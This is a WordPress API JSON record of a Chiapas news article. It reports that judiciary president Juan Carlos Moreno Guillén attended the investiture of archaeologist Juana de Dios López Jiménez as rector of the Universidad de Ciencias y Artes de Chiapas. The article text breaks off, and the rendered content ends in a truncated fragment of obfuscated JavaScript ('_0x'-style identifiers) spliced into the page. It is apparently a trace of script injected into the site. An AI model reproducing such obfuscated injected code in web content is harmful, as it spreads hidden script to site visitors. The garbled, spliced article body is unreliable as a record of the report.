{"id":20359,"date":"2025-02-14T04:02:20","date_gmt":"2025-02-14T04:02:20","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=20359"},"modified":"2025-02-14T04:02:21","modified_gmt":"2025-02-14T04:02:21","slug":"atestigua-moreno-guillen-ceremonia-de-investidura-de-juana-de-dios-lopez-jimenez-como-rectora-de-la-unicach","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=20359","title":{"rendered":"Atestigua Moreno Guill\u00e9n ceremonia de investidura de Juana de Dios L\u00f3pez Jim\u00e9nez como rectora de la Unicach"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"681\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/02\/IMG-20250213-WA0032-1024x681.jpg\" alt=\"\" class=\"wp-image-20360\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/02\/IMG-20250213-WA0032-1024x681.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/02\/IMG-20250213-WA0032-300x199.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/02\/IMG-20250213-WA0032-768x511.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/02\/IMG-20250213-WA0032-310x205.jpg 310w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/02\/IMG-20250213-WA0032.jpg 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Redacci\u00f3n.<\/p>\n\n\n\n<p><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>El gobernador Eduardo Ram\u00edrez Aguilar, encabez\u00f3 el evento y destac\u00f3 la trayectoria acad\u00e9mica de la arque\u00f3loga L\u00f3pez Jim\u00e9nez.<\/li>\n<\/ul>\n\n\n\n<p>El magistrado presidente del Poder Judicial del Estado, Juan Carlos Moreno Guill\u00e9n, atestigu\u00f3 la ceremonia de investidura de la nueva rectora de la Universidad de Ciencias y Artes de Chiapas, la arque\u00f3loga Juana de Dios L\u00f3pez Jim\u00e9nez, en un evento encabezado por el gobernador constitucional, Eduardo Ram\u00edrez Aguilar.<\/p>\n\n\n\n<p>Teniendo como sede las instalaciones del Auditorio Universitario Juan Sabines Guti\u00e9rrez, en la Ciudad Universitaria de la Unicach, el magistrado presidente Moreno Guill\u00e9n se congratul\u00f3 por el inicio de esta nueva era de excelencia acad\u00e9mica para la emblem\u00e1tica casa de estudios, con un nombramiento que, adem\u00e1s, simboliza no s\u00f3lo el impulso a las ciencias y artes, sino el reconocimiento a la trayectoria acad\u00e9mica y a la perspectiva de g\u00e9nero, en beneficio de la comunidad estudiantil.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Redacci\u00f3n. El gobernador Eduardo Ram\u00edrez Aguilar, encabez\u00f3 el evento y destac\u00f3 la trayectoria acad\u00e9mica de la arque\u00f3loga L\u00f3pez Jim\u00e9nez. El magistrado presidente del Poder Judicial del Estado, Juan Carlos Moreno Guill\u00e9n, atestigu\u00f3 la ceremonia de investidura de la nueva rectora de la Universidad de Ciencias y Artes de Chiapas, la arque\u00f3loga Juana de Dios L\u00f3pez &hellip;<\/p>\n","protected":false},"author":2,"featured_media":20360,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-20359","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/20359","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=20359"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/20359\/revisions"}],"predecessor-version":[{"id":20361,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/20359\/revisions\/20361"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/20360"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=20359"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=20359"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=20359"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}